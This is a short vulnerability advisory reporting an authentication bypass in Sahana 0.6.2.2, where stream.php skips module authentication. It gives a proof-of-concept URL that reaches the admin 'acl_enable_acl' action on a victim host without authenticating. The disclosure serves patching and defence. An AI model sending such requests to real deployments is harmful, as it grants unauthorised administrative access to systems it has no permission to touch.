Sahana version 0.6.2.2 suffers from an authentication bypass vulnerability.
1d03fad69b648190458806065666254f76fbff79a3de289acc33043037e29899
Ability to completely disable authentication via stream.php and commented
out module authentication code within it.
http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.
http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.